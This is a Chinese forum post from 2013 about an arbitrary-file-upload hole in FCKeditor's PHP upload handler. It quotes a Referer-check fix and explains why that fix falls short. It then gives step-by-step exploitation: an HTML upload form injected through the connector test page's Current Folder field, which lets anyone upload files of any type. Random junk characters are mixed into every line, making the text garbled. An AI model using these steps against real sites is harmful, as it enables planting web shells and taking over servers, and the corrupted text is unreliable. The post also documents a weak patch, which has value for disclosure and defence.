漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php# ~' g# N+ s. A) T" ^0 t. C
网上给出的修复方案是
0 X% C# j2 ~0 \0 R$ \0 A修复方法,删除FCK编辑器用其他的编辑器
1 y1 d% _+ C: R5 `6 u2 k6 x- s或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
9 H) b9 ?& [& q在
# R8 @2 m6 p ~ B" \$ a3 ~, |require(‘config.php’);
; `4 J0 [/ K+ P" @& frequire(‘util.php’);. |, [$ ^2 ^4 s; P! ^
的下面添加以下代码—————————–$ I0 r6 D6 H$ S! h
//防止外部提交' n/ | @4 A1 s N/ M% p' \
function outsidepost()" Z+ H8 R" H0 B* H9 E7 [
{
* @$ n3 g( _/ \; {$servername=$_SERVER['SERVER_NAME'];( @1 r& [. Q8 o% D$ c5 A
$sub_from=@$_SERVER['HTTP_REFERER'];
5 N1 j' y0 x* I" {6 i" p. t- U1 u$sub_len=strlen($servername);
" w4 `0 l0 m7 A1 Z$checkfrom=substr($sub_from,7,$sub_len);
! m3 H. z) r; g* R( gif($checkfrom!=$servername){
5 X) R; F2 {( W1 h4 D8 |5 d2 Qecho(“you don’t outsidepost!”);
5 s1 @7 a: k0 f* z4 cexit;" \5 X- X8 L- C* y! q. {7 E
}6 i& U2 `' m& I) B8 U9 o6 k+ G
}- M8 L6 a% h3 ~( L" }. p# h
outsidepost();
. F7 l( {9 o0 j; U) A防止外部提交,但是没有防止内部提交,
, E' J$ X% _* T- |& [. A5 r1 e利用方法:# P3 f7 m/ t% I3 h0 j# L4 U
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
1 @- M6 P+ ]& k2,在Current Folder 框输入; t4 X% B! Y( a) Y- `
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
6 D1 w% S2 s7 j }然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
* }6 r# w- ~- h# ]2 CPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对